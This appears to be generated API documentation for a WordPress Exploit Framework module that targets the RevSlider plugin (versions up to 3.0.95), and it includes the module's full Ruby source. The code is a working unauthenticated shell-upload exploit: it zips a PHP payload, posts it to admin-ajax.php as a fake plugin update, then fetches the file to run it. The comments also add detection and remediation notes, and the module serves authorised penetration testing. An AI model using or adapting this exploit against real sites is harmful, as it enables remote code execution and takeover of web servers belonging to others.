Class: Wpxf::Exploit::RevsliderShellUpload

Inherits:
Module
  • Object
Includes:
Wpxf
Defined in:
lib/wpxf/modules/exploit/shell/revslider_shell_upload.rb

Constant Summary

Constants included from WordPress::Options

WordPress::Options::WP_OPTION_CONTENT_DIR

Constants included from Net::HttpOptions

Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST

Instance Attribute Summary

Attributes inherited from Module

#active_workspace, #event_emitter, #payload, #session_cookie

Attributes included from Options

#datastore, #options

Instance Method Summary

Methods included from Wpxf

app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version

Methods inherited from Module

#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #set_option_value, #unset_option

Methods included from Db::Credentials

#store_credentials

Methods included from ModuleAuthentication

#authenticate_with_wordpress, #requires_authentication

Methods included from WordPress::Urls

#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc

Methods included from WordPress::Options

#wp_content_dir

Methods included from WordPress::Login

#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body

Methods included from WordPress::Fingerprint

#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version

Methods included from Net::HttpClient

#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri

Methods included from Net::TyphoeusHelper

#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options

Methods included from Net::UserAgent

#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent

Methods included from Versioning::OSVersions

#random_nt_version, #random_osx_version

Methods included from Versioning::BrowserVersions

#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version

Methods included from Options

#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option

Methods included from OutputEmitters

#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning

Methods included from ModuleInfo

#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info

Constructor Details

#initialize ⇒ RevsliderShellUpload

Returns a new instance of RevsliderShellUpload.



# File 'lib/wpxf/modules/exploit/shell/revslider_shell_upload.rb', line 6

# Registers the module's metadata: display name, description, credited
# authors, public advisory references and the disclosure date. Everything is
# passed to update_info in a single call after the parent initializer runs.
#
# The description and name both state the affected range as RevSlider
# <= 3.0.95, which is the range a defender would compare an installed plugin
# version against.
def initialize
  super

  summary = 'This module exploits a file upload vulnerability in versions ' \
            '<= 3.0.95 of the RevSlider plugin which ' \
            'allows unauthenticated users to upload and execute PHP scripts ' \
            'in the context of the web server.'

  credits = [
    'Simo Ben youssef', # Vulnerability discovery
    'rastating'         # WPXF module
  ]

  # Advisory identifiers as [source, id-or-url] pairs.
  advisories = [
    %w[EDB 35385],
    %w[WPVDB 7954],
    ['URL', 'https://whatisgon.wordpress.com/2014/11/30/another-revslider-vulnerability/']
  ]

  update_info(
    name: 'RevSlider <= 3.0.95 Shell Upload',
    desc: summary,
    author: credits,
    references: advisories,
    date: 'Nov 26 2014'
  )
end

Instance Method Details

#check ⇒ Object



# File 'lib/wpxf/modules/exploit/shell/revslider_shell_upload.rb', line 28

# Version fingerprint for the RevSlider plugin.
#
# Builds the URL of +release_log.txt+ inside the plugin directory and hands
# it, together with a pattern for lines of the form "version x.y[.z]"
# (case-insensitive), to check_version_from_custom_file with '3.0.96' as the
# comparison version.
#
# NOTE(review): '3.0.96' is presumably the first fixed release, since the
# module name gives the affected range as <= 3.0.95; confirm against
# check_version_from_custom_file. The check depends on release_log.txt being
# readable over HTTP; hiding that file would presumably blind this check
# only, so upgrading the plugin remains the remediation.
#
# @return [Object] whatever check_version_from_custom_file returns
def check
  log_url = normalize_uri(plugin_url, 'release_log.txt')
  version_regex = /^\s*(?:version)\s*(\d{1,2}\.\d{1,2}(?:\.\d{1,2})?).*$/mi
  check_version_from_custom_file(log_url, version_regex, '3.0.96')
end

#payload_body_builder(payload_name) ⇒ Object



# File 'lib/wpxf/modules/exploit/shell/revslider_shell_upload.rb', line 38

# Assembles the request body for the plugin's update action.
#
# The body carries three parts:
# * +update_file+: a zip named +revslider.zip+ with a single entry,
#   +revslider/<payload_name>+, whose content is +payload.encoded+
# * +action+ set to +revslider_ajax_action+
# * +client_action+ set to +update_plugin+
#
# The two field values and the +update_file+ part name are fixed strings, so
# they are the parts of this request that server logs or a request filter can
# match on.
#
# @param payload_name [String] file name to give the zip entry
# @return [Utility::BodyBuilder] the populated builder
def payload_body_builder(payload_name)
  Utility::BodyBuilder.new.tap do |form|
    archive_entries = { "revslider/#{payload_name}" => payload.encoded }
    form.add_zip_file('update_file', archive_entries, 'revslider.zip')
    form.add_field('action', 'revslider_ajax_action')
    form.add_field('client_action', 'update_plugin')
  end
end

#plugin_url ⇒ Object



# File 'lib/wpxf/modules/exploit/shell/revslider_shell_upload.rb', line 34

# URL of the RevSlider plugin directory: the +revslider+ segment appended to
# the site's plugins URL via normalize_uri.
#
# @return [Object] the value normalize_uri returns for the two segments
def plugin_url
  plugins_root = wordpress_url_plugins
  normalize_uri(plugins_root, 'revslider')
end

#run ⇒ Object



# File 'lib/wpxf/modules/exploit/shell/revslider_shell_upload.rb', line 51

# Runs the module: confirms the target is an online WordPress site, posts the
# body from payload_body_builder to the admin-ajax URL, then requests the
# uploaded file.
#
# Request sequence as visible to the target's web server:
# 1. one POST to wordpress_url_admin_ajax carrying the update form
# 2. one GET for a file named with 5 to 10 random letters plus ".php"
#    under upload_folder
#
# The method returns false when the online check fails, when there is no
# response or it timed out, when the POST status is not 200, or when the
# response body matches /^0$/ (reported as "not vulnerable or the plugin is
# deactivated"). Once the POST is accepted it returns true whatever the
# follow-up GET returns; the GET's body is only echoed when the status is 200
# and the body is not blank.
#
# NOTE(review): the trailing +true+ passed to emit_info / emit_success
# presumably marks verbose-only output; confirm against OutputEmitters.
#
# @return [Boolean] true once the upload request has been accepted
def run
  super
  return false unless check_wordpress_and_online

  # Emits the error and yields false so each failure path is a single return.
  bail = lambda do |message|
    emit_error message
    false
  end

  emit_info 'Preparing payload...'
  script_name = "#{Utility::Text.rand_alpha(rand(5..10))}.php"
  form = payload_body_builder(script_name)

  emit_info 'Uploading payload...'
  upload_res = nil
  form.create { |body| upload_res = execute_post_request(url: wordpress_url_admin_ajax, body: body) }

  return bail.call('No response from the target') if upload_res.nil? || upload_res.timed_out?

  if upload_res.code != 200
    emit_info "Response code: #{upload_res.code}", true
    emit_info "Response body: #{upload_res.body}", true
    return bail.call('Failed to upload payload')
  end

  return bail.call('Target not vulnerable or the plugin is deactivated') if upload_res.body =~ /^0$/

  payload_url = normalize_uri(upload_folder, script_name)
  emit_success "Uploaded the payload to #{payload_url}", true

  emit_info 'Executing the payload...'
  exec_res = execute_get_request(url: payload_url)
  has_output = exec_res && exec_res.code == 200 && !exec_res.body.strip.empty?
  emit_success "Result: #{exec_res.body}" if has_output

  true
end

#upload_folder ⇒ Object



# File 'lib/wpxf/modules/exploit/shell/revslider_shell_upload.rb', line 47

# URL of the directory in which run looks for the uploaded file:
# +temp/update_extract/revslider+ beneath plugin_url.
#
# For a site owner this is the web-served location to audit for unexpected
# .php files on installs in the affected version range.
#
# @return [Object] the value normalize_uri returns for the joined segments
def upload_folder
  extract_segments = %w[temp update_extract revslider]
  normalize_uri(plugin_url, *extract_segments)
end